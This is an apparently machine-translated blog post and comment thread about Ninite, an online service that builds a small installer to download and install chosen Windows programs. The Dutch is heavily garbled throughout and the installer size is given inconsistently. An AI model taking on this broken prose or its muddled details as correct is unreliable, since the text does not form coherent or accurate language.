Hoe om meerdere programma's tegelijk installeren met een enkel uitvoerbaar - video tutorial

Iedereen wil een Windows-software die geïntegreerd te maken, zodat ze kunnen automatisch worden geïnstalleerd door het besturingssysteem. Ik persoonlijk iets niet aanraden en ik zal uitleggen waarom.
In de tussentijd kunnen nieuwe versies van de applicaties / software die u in dat Windows wilt integreren, eenmaal gebrand met de gewijzigde Windows-CD, niet meer worden gewijzigd, u moet de installatiekit opnieuw wijzigen om de nieuwe versies van de software te integreren en natuurlijk om een ​​andere CD te branden, ik weet niet hoe ik elke maand een Windows-CD moet branden en natuurlijk "branden" en de tijd met de modificatie van de kit !!
Wat ik vandaag voorstel is een online dienst genaamd Ninite laat ons toe om een ​​kit die al onze favoriete software bevat (voor zover deze beschikbaar is op die site) te creëren. Zij zullen Ninite website klaar gegroepeerd in categorieën alleen de beste geselecteerd. Wat u hoeft te doen is een bezoek de site, kiest u de toepassingen die u wilt de kit die wordt gegenereerd nadat je hebt besloten wat je wilt gebruiken zijn. Ervan uitgaande dat je kiest welke software je wilt, klik dan op de 'Get Installer "en je krijgt een beetje 165 kb executable die je overal mee kunt nemen, zetten het op een USB-stick.
Waarom alleen 165 KB ?? Omdat dit resultaat uitvoerbare software, maar uw favoriete informatie niet zal bevatten over wat je nodig hebt om te downloaden en te installeren voor je.
Laten we zeggen dat je dit uitvoerbaar op een USB stick ... en vandaag de dag je gewoon een Windows installeren, goed is het vrij lang installatieproces handmatig elke zacht, je moet naar elkaar op de sites om ze te downloaden, dan voor elk next, next, finish ... sommigen van hen hebben te verblijven, dat niet wil vinkje niet weten wat toolbar van Yahoo en ga zo maar door.
Met deze kit met u Ninite website gegenereerd op basis van uw voorkeuren nadat u Windows installeren en deed de internetverbinding, gewoon Ninite draaien en het zal automatisch uw favoriete software te downloaden en te zeggen: "NO" automatisch werkbalken ze bevatten een aantal software, en je wordt automatisch alles wat u van plan om te wachten voor hem om zijn werk af te installeren.

Het is heel belangrijk om internetverbinding hebt terwijl je loopt, want zoals ik al zei boven dat uitvoerbare weinig 156 kb alleen informatie en instructies over wat hij heeft gedownload en geïnstalleerd bevat, in principe is het alleen een online installateur.

Maar laten we het beter om video tutorial elkaar volgen.

Vergeet niet, als u suggesties, klachten of toevoegingen aarzel dan niet om te schrijven in het opmerkingenveld, de-ook als je ontmoet het opmerkingenveld een gebruiker een probleem heeft en je kan hem helpen, aarzel dan niet om het te doen, de enige manier waarop we dat doen deze plek beter, zie het kader comments!

Veel plezier!

Adrian Burlugeanu...... ..landpc.wordpress.com

Get the Flash Player om de video te zien


Related TutorialsOver Cristian Cismaru

Ik hou van alles wat met IT & C, ik wil graag de ervaring en de informatie die we verzamelen elke dag te delen.
Leren als je leren!

Comments

 1. CPU09 zei hij

  Ms Adrian, lange tijd was ik op zoek naar een van deze dingen zo! Zeer goede tutorial.

 2. En natuurlijk zeer goed programma en videotutorialul

 3. blackarow zei hij

  Wonderful !!! Zoals je zegt en wat we konden meer dan dat willen?!?!?! Nu ik persoonlijk Ik heb een suggestie. Mijn gok is dat het zou willen in de eerste plaats om antivirusu install '(wat het ook is) en vervolgens start de applicatie gezegd. Anders alleen goed groeten Adrian !!!

 4. Gefeliciteerd Adrian voor deze les zeer behulpzaam.

 5. Cristi250 zei hij

  Zeer moeilijk deze tutorial. Een interessante kleine programma om het en ik neem

 6. Cristi250 zei hij

  Op die manier als je zei in het begin dat de nieuwste versies van het meest recente voorbeeld downloadt wanneer de beta-programma is een kijk op dat?

 7. geolino zei hij

  hello ... f 22ror bruikbaar les! Maar ik had een misverstand .. nu kteva dagen nam op een bepaalde tracker een Windows "geregeld" betekenis na de installatie KND hebben een instelling die als ik erop klik opende een raam en moest u kiezen welke programma's te installeren op uw pc ... .. Cuz ik begrijp en kunt u mij vertellen hoe ik hetzelfde kan doen ??

 8. Adrian zei hij

  geolino: Hallo 22ror ... f bruikbare handleiding Maar ik had een misverstand kteva dagen .. nu heb ik op sommige tracker unwindows "geregeld" betekenis na de installatie knd hebben een instelling die als ik erop klik opende een raam en moest u kiezen welke programma's te installeren op uw pc ... .. dak begrijpen en kunt u mij vertellen hoe ik het zelfde ding kan doen ??

  Heb je niet iets in deze tutorial te begrijpen !! Ik was gewoon te zeggen dat het niet de moeite waard zoals ramen, het is altijd goed om de nieuwste versies van toepassingen. CD met uw ramen eens verbrand en veranderd 1 een maand om te gooien, want het al uitging nieuwe versies van software dat je ze op te nemen in het. De man zal niets zeggen en ik zal je niet leren ... ja je ... Batman Batman, houden een en goed op de jouwe. U kunt gebruik maken van WPI (Windows-installatie) om die menu te maken ...

 9. geolino zei hij

  Ik begreep precies k stappen .. maar persoonlijk die niet kunnen veroorloven om net dak aan de andere kant zo te denken ... het uw waardering batman blijft

 10. Ozgean zei hij

  Ik heb gezien dat de meerderheid van de Windows 7 toen hij zei dat de officiële werden hem geprofileerd. Nou ik ben ook een van die mensen, maar ik heb een probleem met het dus ik elke toepassing gaan, maar 8.0 DirectX games en films zijn altijd blokeza zichzelf gewoon zien als software. Kunt u mij vertellen waarom het spul gebeurt als drivare Ik heb dagelijks bijgewerkt en codecs voor video een aantal van de beste dat de XP ging perfect en ik downloadde de zelfde codecs voor Windows 7 en nog steeds niets ...

 11. Adrian zei hij

  OzgeanIk heb gezien dat de meerderheid van de Windows 7 toen hij zei dat de officiële werden hem geprofileerd. Nou ik ben ook een van die mensen, maar ik heb een probleem met het dus ik elke toepassing gaan, maar 8.0 DirectX games en films zijn altijd blokeza zichzelf gewoon zien als software. Kunt u mij vertellen waarom het spul gebeurt als drivare Ik heb dagelijks bijgewerkt en codecs voor video een aantal van de beste dat de XP ging perfect en ik downloadde de zelfde codecs voor Windows 7 en nog steeds niets ...

  Zie je die verschillende codecs voor Windows 7 zijn is een speciaal pakket van codecs voor Windows 7 !! Laatste pakket van codecs voor Windows is 7 DEZE. Niet te installeren dan wat je hebt, Uninstall codecs die je nu hebt en dan smullen degenen die ik zei, ik beveel u verwijderen met Revo Uninstaller, Revo als je niet kunt gebruiken, hebben we uitleg over het, schrijven in de 'Search videotutorial.ro ... "Rechts: Revo, je binnenkomt en je zal de tutorial!

 12. Adrian zei hij

  geolino: Nou tocmaik begrijp ik .. maar persoonlijke kinderen kunnen zich niet veroorloven om zijn dak net is aan de andere kant te denken ... het blijft uw waardering Batman

  Als dat niet netto u kunt zien, omdat je hier kwam ... Welke software zou u willen vragen mooi, ze krijgen uit het net en branden op een cd of dvd en je duci.O om een ​​tutorial over te maken als integreert Windows.

 13. geolino zei hij

  stro en dat betekent niet dat je verbrandt CD of DVD naar de maan? aaa .. niet de maan. Kiara kan tot 2 2 dagen hangt af van wie het dagelijks nodig heeft.! Je goed hoe dan ook bent

 14. Adrian zei hij

  geolino: Nou en dat betekent niet dat je verbrandt CD of DVD naar de maan? aaa .. niet de maan. Kiara kan tot 2 2 dagen hangt af van wie het dagelijks nodig heeft.! Je goed hoe dan ook bent

  Nou ... jij of je Nene net of niet? Uiteraard, zoals je zegt ... geen netto .Wij hebben geen andere keuze dan op cd te branden mei ... een andere oplossing als je weet dat je alleen maar toe te passen. Met zo een keer zeggen dat je zo. Als je heel duidelijk, niet de moeite waard om uw CD met software meegeleverd, tenzij je net dan is dat ... een andere oplossing u alleen tijd hebt om uw netto stok of verbranden elke maand CD met software geïntegreerde net've zei . Waarom is dat zo moeilijk te begrijpen? Je hebt net? Je out !!! Net ... dat is niet je ... zet je of bidden voor een en Altu om u te laten krijg je nieuwste softwareversies en leg ze op een cd.

 15. softuletul buitengewone broers ... Oké, wat we zouden willen meer dan dat ... je gaf manier, naar koffie, kom terug en je een duik in de PC ... nou ja, je zegt, het is geen wonder ??? ... Thanks Adrian !!!

 16. Adrian, zeer goed tutorialu maar kunt u als u weet dat een soortgelijk programma, maar kan ik programma's die ik wil en ik ga op cd of stick, omdat ik veel programma's autorun CD hebben geprobeerd, maar doet dit programma en appel geïnteresseerde hoe meer naar een CD met drivere.ca maken, omdat er veel laptops die niet worden geleverd met CD met drivers.

  Dank u voor uw begrip ff.mult

 17. gevangenis zei hij

  Wij doen een goede aardige leerprogramma over hoe de registri.am Kaspersky Lab Kaspersky verwijderd met revo verwijderen, maar allemaal voor niets, je weet wat ik refer.va dank u voor het werk dat je doet, is u en de rest van dit hoofdstuk in Roemenië .tineti het goede werk

 18. Iustin zei hij

  Alut goede harde en samenvoegen ba da softu dit gebied beschikbaar te stellen voor iedereen te begrijpen is dat geen geluk blijft

 19. Nicolas zei hij

  erg cool en behulpzaam en ik leerde het nu 3 dagen van de radio

 20. wolfwarine zei hij

  Soft..felicitari zeer nuttig deze !! ... Buba is namelijk kunt u slechts een beperkt aantal gratis programma's worden geïnstalleerd, omdat deze niet alleen nuttig om de man het huis zou zijn geweest anderen: (... gezien het feit dat de VDR is alles vrij en vergemakkelijkt het werk is erg goed en zo.
  Wachten op de andere tutorials ... nogmaals proficiat !!!;)

 21. Adrian zei hij

  wolfwarineZeer nuttig dit soft..felicitari !! ... een kook is namelijk je kan worden geïnstalleerd slechts een beperkt aantal gratis programma's die nuttig zijn, niet alleen omdat het huis van de man zou hebben gegeven vdr en meer ... het is allemaal gratis en vergemakkelijkt het werk is erg goed en zo.
  Wachten op de andere tutorials ... nogmaals proficiat !!!;)

  Ik weet dat deze service omdat het in beta, en 10 applicaties beschikbaar waren, waren ze erg weinig, en nu eens kijken wat je kiest in de toekomst software zal worden toegevoegd!

 22. Ozgean zei hij

  Dank u wel, meneer Adi codec, ja ik 7 Windows Laura en dit is zo goed als in beta. Bag XP als ik ben moe van bugs en fouten die ze tegenkomen op 7 ...

 23. Marian zei hij

  Na het voltooien van alle programma's in hun pagina hieronder al is dit een tekstvak waar u sugetii programma's kunt invoeren.
  Erg handig programma, kreeg ik veel tijd met hem.

 24. Dragos zei hij

  Het is heel mooi dat Ninite, maar heeft geen medelijden met Winamp, Yahoo Messenger, DFX wat de gebruikers het meest gebruikt.

 25. Adrian zei hij

  Dragos: Het is erg leuk dat Ninite, maar heeft geen medelijden met Winamp, Yahoo Messenger, DFX wat de gebruikers het meest gebruikt.

  Ik hierboven al zei, deze dienst is beginnen wil in de tijd worden toegevoegd toepassingen die we kennen deze service omdat het in beta en waren 10 toepassingen en vergeten dat nu heb je een keuze zijn meer toepassingen, service nauwelijks van Beta ...

 26. hallo, ik had een beetje hulp van u als u kan, weet niet hoe ik verdwenen lokale schijf (s) en nog belangrijker niet weten hoe om het terug te zetten of hem terug als ik niet meer lees geen cd. als je iets lichter kan uitleggen dat een beginner bent, verwacht ik antwoorden met veel opwinding.

 27. Hallo. Ik vind het perfect. Nuttig voor veel mensen die niet de tijd of het geduld om een ​​aantal programma's die al heeft Ninite downloaden hebben. Natuurlijk moet niet alles genoeg maar ik zelf PC. Antivirus, en ik denk, dus het moet niet los zelfs de eerste na de video en audio drivers worden geïnstalleerd.
  App. zou goed zijn als downloads, zoals chauffeurs. In het bijzonder updates.
  Proficiat aan Adrian. Maar kalm en uitleggen aan de mensen hoe en wat te doen. Neem voorbeeld van Cristi

  Bafta verder jongens.

 28. Nicolas zei hij

  Ik heb een vraag als je je systeem kits op 64 64 bit of bytes is alleen voor systeem 32 32 beetje te installeren als alleen de bits een beetje 64 deel moet doen en de keuze hebben

 29. Adrian zei hij

  Nicolas: Ik heb een vraag als je je systeem kits op 64 64 bit of bytes te installeren is alleen voor systeem 32 32 bit als alleen de bits een beetje 64 deel moet doen en de keuze hebben

  Ik weet niet om je antwoorden op hun website geen informatie over dit lucu geeft niet .. Maar ik denk dat alle beetjes zijn 32 ...

 30. Nicolas zei hij

  Adrian toch bedankt voor het antwoord doen een geweldige job

 31. Nicolas zei hij

  Adrian toch bedankt voor het antwoord heb een geweldige baan eerlijk gezegd niet echt om bijna geen Engels, maar ik merkte ze hebben een gedeelte waar je kunt raden free kits je lukt om een ​​vraag te stellen of ze kunnen worden geïnstalleerd op of doe stukjes 64 een hoofdstuk over 64.biti

 32. zeer nuttig tutorial wachten en Aleteia ... respect voor. videotutorial team

 33. cristi zei hij

  bravo vader zijn begonnen te krijgen tot de admins van anderen nog proberen om specifiek te reageren op reacties [Ik kan geen antwoord geven op uw] eerste tests op de pc [en ik gaf vuur]

 34. Adrian zei hij

  cristi: Bravo vader zijn begonnen om te voldoen aan admins anderen 'nog steeds proberen om specifiek te reageren op reacties [Ik kan geen antwoord geven op uw] eerste tests op de pc [en ik gaf vuur]

  Hoe om te testen op mijn pc vrienden?? Ik denk dat je een gefrustreerd en niet hebben wat je aan begint en je moet in gedachten ... om te worden commentaar op het en om je iets ... Aangezien de site zegt niets 64 stukjes waar ik wil de 64 verwijderen bits en testen? Je vooruit denkt om te stellen dat? Heb je gekeken op de website en je man om te zien wat "meer" informatie is er? Van waar ik wilde de bits en testen 64 verwijderen? =)) Ik stel voor dat u de volgende keer nadenken voordat je reactie achter te laten of te laten ...

  Heeft u Immolation als de vorige keer !!!

 35. cristi zei hij

  Ik cijfer je krijgt vonk en vuur [Heb je jezelf verbrand, als de vorige keer] niet van streek zelf zijn goed vtutorialele, naar ze te kijken, maar toen ik zag je aan te vallen [zijn slimme jongen en niet meer voldoen aan de uitdagingen] SUCCES. EN ZAL kijken

 36. marmidor zei hij

  Respect voor mensen die hulp.
  Je bent zo vochtig in alles wat je doet.
  Keep up the good work.

 37. Bogdan Stroe zei hij

  Zeer nuttig dit programma. Ik een toepassing die iets dergelijks onder anderen doet gemaakt -> EasyShell, maar Ninite is veel beter.

 38. Hallo. Eerste tutorialu lekker moeilijk uit te leggen. paar dagen heb ik geprobeerd om documenten en Intal Mac luipaard v10 op pc desktop te krijgen en door middel van verschillende pogingen slaagde ik erin de eerste keer dat ik niet RESUS omdat ISO-images was niet goed, maar toen ik het installeerde ik was verbaasd hoe snel wil dit besturingssysteem dat we deden was conecsiunea internet ik belde de UPC als ze hebben samentrekking en grotendeels niemand de instellingen niet omgaan met prt net opzij intalare van Addicted ik zei zelfs ik zie hoe dat blijkt. op een schaal van 1-10 kiezen 10 + overtreft linux, XP, Vista, wind 7 eenvoudig graphics veel beter systeem werkt veel sneller en wat mij verbaasde zoveel was hoe echt zou lijken op u een venster naar links te verplaatsen of had inpresia rechterhand, dat eerlijk had aangeraakt in alle besturingssystemen me getest leek het beste in de toekomst zullen we proberen uit te vinden hoe te beheren om te doen conecsiunea het net. zeer mooie Adrian doen die misschien in de toekomst en ongeveer intalare MAC kent.

 39. Bogdan StroeZeer nuttig deze program.Eu voerden we een aplicatiecare onder anderen iets soortgelijks te doen -> EasyShell, maar Ninite is veel beter.

  Als u de maker van dit programma verstandig om documetatia of het geven van ons een aantal aanwijzingen voor de analyse, als het kan worden gedaan en een leuke les over het zou zijn.
  We zouden blij zijn om Roemeense software te bevorderen.

 40. shon3l zei hij

  Cristi-admin: EasyShell

  deze man is nuttiger dingen. ...........
  Studie gemaakt.
  Ik ben op zoek naar een stille installateur veel gemakkelijker te gebruiken. videotutorial.ro geluk

 41. Gepeto zei hij

  Het is net als Betooni installeert op turbo snelheid broer en u kunt genieten van uw rust bier totdat het installeert alle geselecteerde toepassingen koel en nuttig
  maar meer en het installeert altijd de laatste versies van de software en ze niet slijten
  Super merchandise bedankt

 42. Bedankt voor de tutorial hoe dan ook, als ze meer programma's

 43. Bogdan Stroe zei hij

  Cristi-admin:
  Als u de maker van dit programma verstandig om documetatia of het geven van ons een aantal aanwijzingen voor de analyse, als het kan worden gedaan en een leuke les over het zou zijn.
  We zouden blij zijn om Roemeense software te bevorderen.

  Het zou cool zijn om een ​​video tutorial over te maken. Ik stuurde zelfs een voorstel in dit verband in de mail (de cristiteo) een maand geleden. Het programma heeft geen documentatie, maar "http://myeasyshell.com/RO/" op pagina orders en andere vragen vindt alle informatie over het programma te vinden. Ook op de site zijn er zelfstudie (niet echt-managed) door mij in het Engels.

 44. Adrian zei hij

  Interessant, maar niet erg praktisch. Ik hoop om meer te werken aan de toepassing en zijn het toevoegen van meer software.

 45. Adrian zei hij

  Bogdan Stroe:
  Het zou cool zijn om een ​​video tutorial over te maken. Ik stuurde zelfs een voorstel in dit verband in de mail (de cristiteo) een maand geleden. Het programma heeft geen documentatie, maar "http://myeasyshell.com/RO/" op pagina orders en andere vragen vindt alle informatie over het programma te vinden. Ook op de site zijn er zelfstudie (niet echt-managed) door mij in het Engels.

  Hallo, Ik zag je tutorial mezelf, wat ik moet zeggen, het is heel mooi wat je hebt gedaan, maar mensen zullen nooit iets vergeten ... gebruik het toetsenbord! En dat is wat maakt uw softuletul. De man wil alles onder de muis hebben, in een enkele klik, mensen alleen maar weten om de sneltoetsen te schrijven, als je hen vraagt ​​om te laten zien wat toetscombinaties niet eens weten dat het bestaat ... Petje af en respect voor je voor wat je gedaan hebt Ik denk niet dat ze zullen meer belangstelling te tonen, is het mogelijk ik verkeerd ben, dus het is geweldig idee om mij als een IT-liefhebber, maar we hebben hier op de site kunnen we niets aan de mensen alleen voor kenners brengen ... moet zijn onpartijdig en houden Omu eenvoudige grab de muis en vandaag op de IT brood eten

 46. BV71BBT zei hij

  Brava aan u kerels!
  *******
  Ik weet niet waar te stemmen of wat?

 47. Adrian zei hij

  BV71BBT: Brava aan u kerels!
  *******
  Ik weet niet waar te stemmen of wat?

  Linksboven direct boven de titel "1,651 visionair" en onder een aantal steulte .... als u ons 5 5 sterren klik op de sterren en ga zo maar door ...

 48. Bogdan Stroe zei hij

  Adrian:
  ... Mensen willen niet het toetsenbord te gebruiken. [..] De man wil alles onder de muis hebben, in een enkele klik, mensen alleen maar weten om de sneltoetsen te schrijven, als je hen vraagt ​​om te laten zien wat toetscombinaties niet weten dat er dus ... [..] moet onpartijdig zijn en blijven eenvoudig Omu vandaag pak de muis en degene die brood eet IT

  Het is onmogelijk om het allemaal met een enkele klik! Grafische interfaces zijn tegenwoordig steeds meer complexe en ingewikkelde menu functionaliteit is verborgen onder tientallen knoppen die je niet weet tot u de bijbehorende tooltip en hotkey die verschilt van het ene programma naar het andere.

  De man gebruikt om de muis als het had ook dergelijke alternatieven (zoals EasyShell, Enso en altelte) tot nu toe en wat leek als een beetje laat nu dat de focus op multi-touch (toekomstige Tablet PC Apple en MS, MS Surface, BumpTop, Apple iPhone, etc)
  EasyShell bestaat zowel voor degenen die hand te maken op de muis voor de eerste keer en voor degenen die beter zonder doen. Maar bijna niemand gebruikt

 49. dumitru32 zei hij

  Bogdan Stroe"Http :/ / myeasyshell.com / RO /"

  Ik heb je tutorial gezien, goed voor u als de Hulk neemt u dus !!!! Je maakte een Linux windows

 50. vasile zei hij

  Goede tutorial maar uit te werken in dit Ninite online toegang

 51. Dragos zei hij

  Mag ik stuur en programma voorstellen, heb ik dus gedaan in Winamp en het werkte;)). Een uitputtende werk om de installatie van programma verkorten.

 52. Gabriel Costel Irescu zei hij

  Hallo aan iedereen!

  Ik ben erg blij heel blij met wat je hebt gedaan deze site, ik gaf je de aansluiting van een heleboel mensen, het is prachtig, ik heb een paar vragen;
  * Ik installeerde Windows 1 7, niet voor de eerste keer, heb ik veel interessante instellingen ontdekt en maken het zo goed is maar een ding dat ik kon mic werk niet te doen op sommige pc's en niet te vinden een programma dat schrijft naar DVD's en pote ROOD BLAUW plaatsen wat de tweede vraag.:
  2 * je kunt doen een video tutorial CD Hiren Maar [het creëren van een afbeelding en installeer afbeelding GHOST GHOST uit] ik probeerde te doen ammfacut enkele foto's, maar niet heel succesvol, als ik wist dat ik zou doen tutorial video maken veel programma's die zijn erg goed en nuttig thuis lumea.Va geven veel dank aan alle mensen zijn een fantastisch team.

 53. Darius zei hij

  Cristi Ik zou pretty please doe een tutorial over het installeren GTA 4 pretty please niet weet hoe het te doen en ik echt wil spelen en ik wil u zeggen dat ik echt graag uw tutorials zal willen succes en de verdere

 54. Voor cultuur Adrian (de eigenaar van deze tutorial):
  "Toepassingen die u heeft geïnstalleerd 'is achterhaald ... het is de term die hem niet konden vinden! Die toepassingen niet "verlopen", omdat het dat totaal zou betekenen uit de roulatie!

 55. Clony: De cultuur van Adrian (de eigenaar van deze tutorial):
  "Toepassingen die u heeft geïnstalleerd 'is achterhaald ... het is de term die hem niet konden vinden! Die toepassingen niet "verlopen", omdat het dat totaal zou betekenen uit de roulatie!

  Voor uw informatie:
  Wanneer u een tutorial ontwerpen niet altijd de woorden te vinden op dat moment, de spanning groter is dan normaal, nerveus bent, proberen om meer informatie in een relatief korte tijd over te brengen.
  Dat betekent niet dat je niet weet of je analfabeet bent.
  Het lijkt alsof je bent behoorlijk rauw ideeën niet door het filter intellect, je haast, je snel wilt aanvallen te bijten, je bent agressief!.
  Uitvoeren en je een tutorial om iedereen te laten zien hoe vaardig je bent, zullen wij uw werk plaatsen in de buurt van Adrian's tutorial, laten we zien wat nieuw materiaal je bent klaar.

 56. Adrian zei hij

  Clony: De cultuur van Adrian (de eigenaar van deze tutorial):
  "Toepassingen die u heeft geïnstalleerd 'is achterhaald ... het is de term die hem niet konden vinden! Die toepassingen niet "verlopen", omdat het dat totaal zou betekenen uit de roulatie!

  als je kijkt naar al de tutorial merkt op dat mam gecorrigeerd en zei dat het "... maar niet zal vervallen als er nieuwe versies komen", maar het lijkt alsof het was gewoon je socupul fouten ... te jagen ... je die fout gehoord, je de tutorial gegeven te stoppen , en snel beoordelen jullie op, je snel om stenen te gooien terwijl moeder snel verholpen zijn. zodat je weet dat een aantal do ... aan "spit" te zijn vreemd, om RAP zetten, om anderen te versterken. Ik ben hier niet om u of u of anderen Roemeense taal te leren, maar om wat uitleg in termen van IT te geven.

  • PauLXRocK zei hij

   Adrian:
   als je kijkt naar al de tutorial merkt op dat mam gecorrigeerd en zei dat het "... maar niet zal vervallen als er nieuwe versies komen", maar het lijkt alsof het was gewoon je socupul fouten ... te jagen ... je die fout gehoord, je de tutorial gegeven te stoppen , en snel beoordelen jullie op, je snel om stenen te gooien terwijl moeder snel verholpen zijn. zodat je weet dat een aantal do ... aan "spit" te zijn vreemd, om RAP zetten, om anderen te versterken. Ik ben hier niet om u of u of anderen Roemeense taal te leren, maar om wat uitleg in termen van IT te geven.

   Adrian:
   als je kijkt naar al de tutorial merkt op dat mam gecorrigeerd en zei dat het "... maar niet zal vervallen als er nieuwe versies komen", maar het lijkt alsof het was gewoon je socupul fouten ... te jagen ... je die fout gehoord, je de tutorial gegeven te stoppen , en snel beoordelen jullie op, je snel om stenen te gooien terwijl moeder snel verholpen zijn. zodat je weet dat een aantal do ... aan "spit" te zijn vreemd, om RAP zetten, om anderen te versterken. Ik ben hier niet om u of u of anderen Roemeense taal te leren, maar om wat uitleg in termen van IT te geven.

   adrian mij beter leek super ok ji kwam met fouten die je deed ..... zet je een pik en humor in wat je zegt, het slechtste uit zonder mij ..... en zo leek het chill, tarel super ;)

 57. Adrian zei hij

  Clony: De cultuur van Adrian (de eigenaar van deze tutorial):
  "Toepassingen die u heeft geïnstalleerd 'is achterhaald ... het is de term die hem niet konden vinden! Die toepassingen niet "verlopen", omdat het dat totaal zou betekenen uit de roulatie!

  Zon erg benieuwd hoe soepel, en de student zal roepen u maakte een tutorial! Niet betaald door iedereen en we hebben niets te maken met MEC, we doen uit pure passie voor mensen, een verlangen om het kielzog roemenië, mensen, en het verlangen om anderen hoe het te doen onderwijzen te maken, en hoe je een PC gebruiken .

 58. We hebben iemand ongeschoold.
  Die door het filter intellect - zoals je zegt - proberen - "tussen de regels" - om te suggereren dat de pre-training instructievideo, met meer aandacht, alvorens het "in de lucht". Aan de andere kant, niet graag de hypocrisie van al diegenen die te posten video tutorials op deze site die is, hoogtepunt toepassingen, programma's etc dat je ze zou installeren in het Engels (legitiem, in feite), maar als het gaat om de uitspraak, dat ( Wat ook houder instructievideo) de voorkeur aan de korting gênante spelling te maken en een voor een arme, blijkt uit overmatige terughoudendheid, naar verluidt op grond van het feit dat degenen die kijken naar deze video tutorials niet in staat zou zijn om een ​​te begrijpen veel dichter bij de uitspraak juist. Niet de andere, maar zelfs zeer scherpe Adrian, vermaant ze degenen die niet weten of niet ontwikkeld met Engels (in zijn feedback over de opmerkingen van anderen, naar andere video tutorials). En, hier geef ik absoluut gelijk dat moet worden ingevoerd, met Engels ... net zo veel als, en hij en de andere, met de uitspraak op te zetten, om aandacht te tonen voor degenen die gewoon vermaant! Wanneer u ook tutorials te publiceren, ik denk dat het een kwestie van professioneel leren ten minste een correcte uitspraak van de taal waarin, soms, die periode leest u, aan de ene kant, en aan de andere kant, een meer letterlijke vertaling, en niet Motamo - Waar mogelijk - of verblijven in de oorspronkelijke terminologie, ze kan ook niet anders, in dit geval Engels.
  Als je alleen op grond van het feit dat alleen hebben we geleerd van je tutorials video en niet andersom, maakt een grote fout.

 59. Clony: We hebben iedereen ongeschoold.
  Die door het filter intellect - wat dan ook - proberen - "tussen de regels" - dat vooraf training video tutorial suggereren meer zorgvuldig, alvorens "in het licht". Aan de andere kant, niet van de hypocrisie van al diegenen die video tutorials posten op deze site: dat is, highlight toepassingen programeetc u liever te installeren in het Engels (legitieme, in feite), maar als het gaat om de uitspraak, dat de (eventuele houder als video tutorial) verkiezen om compromissen te sluiten om een ​​spelling en gênant, te maken met een slechte, uiteraard van onnodige terughoudendheid, naar verluidt op grond van het feit dat degenen die kijken naar deze video-tutorials zou niet in staat zijn om een ​​uitspraak te begrijpen veel dichter bij de juiste is. Niet de ander, maar ook Adrian zeer uitgesproken, vermaant hij degenen die niet weten of niet ontwikkeld met het Engels (in zijn feedback over de reacties van anderen, andere video tutorials). En, hier, geef ik absoluut gelijk dat het op zijn plaats moeten worden gebracht met de Engels taal ... net zo veel als, en hij en de andere, op te zetten met de uitspraak, alleen maar om aandacht te tonen voor degenen die vermaant! Wanneer u ook tutorials publiceren, ik denk dat het op zijn minst een kwestie van professioneel leren correcte uitspraak van de taal waarin, soms, je leest het woord, aan de ene kant, en aan de andere kant, als literaire vertaling, en niet Motamo - Waar mogelijk - of verblijven in de oorspronkelijke terminologie, ze kan ook niet anders, in dit geval Engels.
  Als je alleen op grond van het feit dat alleen hebben we geleerd van je tutorials video en niet andersom, maakt een grote fout.

  Het aanbod blijft geldig, zou het beter zijn om ons te laten zien hoe goed je zou kunnen verwerken in de huid van een van ons.
  Het ding is al te serieus.
  Wachten ....

 60. Adrian zei hij

  Clony: We hebben iedereen ongeschoold.
  Die door het filter intellect - wat dan ook - proberen - "tussen de regels" - dat vooraf training video tutorial suggereren meer zorgvuldig, alvorens "in het licht". Aan de andere kant, niet van de hypocrisie van al diegenen die video tutorials posten op deze site: dat is, highlight toepassingen programeetc u liever te installeren in het Engels (legitieme, in feite), maar als het gaat om de uitspraak, dat de (eventuele houder als video tutorial) verkiezen om compromissen te sluiten om een ​​spelling en gênant, te maken met een slechte, uiteraard van onnodige terughoudendheid, naar verluidt op grond van het feit dat degenen die kijken naar deze video-tutorials zou niet in staat zijn om een ​​uitspraak te begrijpen veel dichter bij de juiste is. Niet de ander, maar ook Adrian zeer uitgesproken, vermaant hij degenen die niet weten of niet ontwikkeld met het Engels (in zijn feedback over de reacties van anderen, andere video tutorials). En, hier, geef ik absoluut gelijk dat het op zijn plaats moeten worden gebracht met de Engels taal ... net zo veel als, en hij en de andere, op te zetten met de uitspraak, alleen maar om aandacht te tonen voor degenen die vermaant! Wanneer u ook tutorials publiceren, ik denk dat het op zijn minst een kwestie van professioneel leren correcte uitspraak van de taal waarin, soms, je leest het woord, aan de ene kant, en aan de andere kant, als literaire vertaling, en niet Motamo - Waar mogelijk - of verblijven in de oorspronkelijke terminologie, ze kan ook niet anders, in dit geval Engels.
  Als je alleen op grond van het feit dat alleen hebben we geleerd van je tutorials video en niet andersom, maakt een grote fout.

  Weet je nog toen je in de klas en de leraar kwam om je 1 nemen je hand erin en maak het mee op de "a" naar "b"?
  Dat is wat we willen doen we hier hebben ...
  Wat zou de leraar die je geleerd om te schrijven om te laten zien alleen de raad als aan te tonen door "a" "b" etc en aangezien je niet doen om u te vertellen ... "He schatje slecht zijn geweest ... als niet je uit ... dat is ... ik doe niet wat je doet ... Ik kan niet geven u de vaardigheden die je Pixu in de hand en schrijf "?

  Je kunt niet zeggen tegen mensen en het zien van een aantal termen die je niet kunt uitleggen stuur ze om te studeren! Vanwege dat ze hier zijn om te leren!

  Wij maken deze tutorials voor die van Cisco of wat niet voor Amerikaanse universiteit, maar voor gewone mensen, en geloof me dat het proberen om de woorden te vinden en uitleg over de simpele Omu niet de IT te begrijpen, kijken en je naam!

  Ik daag u start, doe een tutorial zie je hoe goed we zijn!

  Er was een zoals jij ... jij bent het soort mensen die alleen kijken naar voetbal ... zitten in de tribunes, het eten van zaden en boeren zweren dat wanneer een speler een fout maakt, maar als je stort je in de grond en maak je rennen en de spelers die de land niet weet wat te doen met het .. struikelen haar. Onze site is niet gelieerd MEC goedkeuring aan de organisatie of wat niet ... is een site gemaakt door gewone mensen voor gewone mensen, niet de "deken" als professoren of wat niet Olympisch Roemeense taal!

  Als ik de grootste schilder van de wereld, maar ik zou niet weten hoe te schrijven, wat doe je dan? Ik ben niet geroepen om u een beeld te geven simpelweg omdat ik niet weet om te schrijven? Dat we een land dat incompetent ... niemand heeft enig baan voor de status bracht ons over het hoofd met kracht alle culturen en wetenschappen 's werelds plaats vrij blijven voor iedereen om te leren precies wat u nodig heeft voor het gebied van de en zijn beroep. We gorged land, werklozen geesten en thuis blijven ... waarom? vergeet het maar. De man die vrij om zich te concentreren en te leren precies wat er op zijn werk was vertrokken. Mensen zouden beter worden gecategoriseerd en elk hoofd vol van wat hij wil zou hebben en goed in wat ze doet zou nu ... drum werklozen en thuis blijven ...

 61. vanessa zei hij

  Clony: We hebben iedereen ongeschoold.
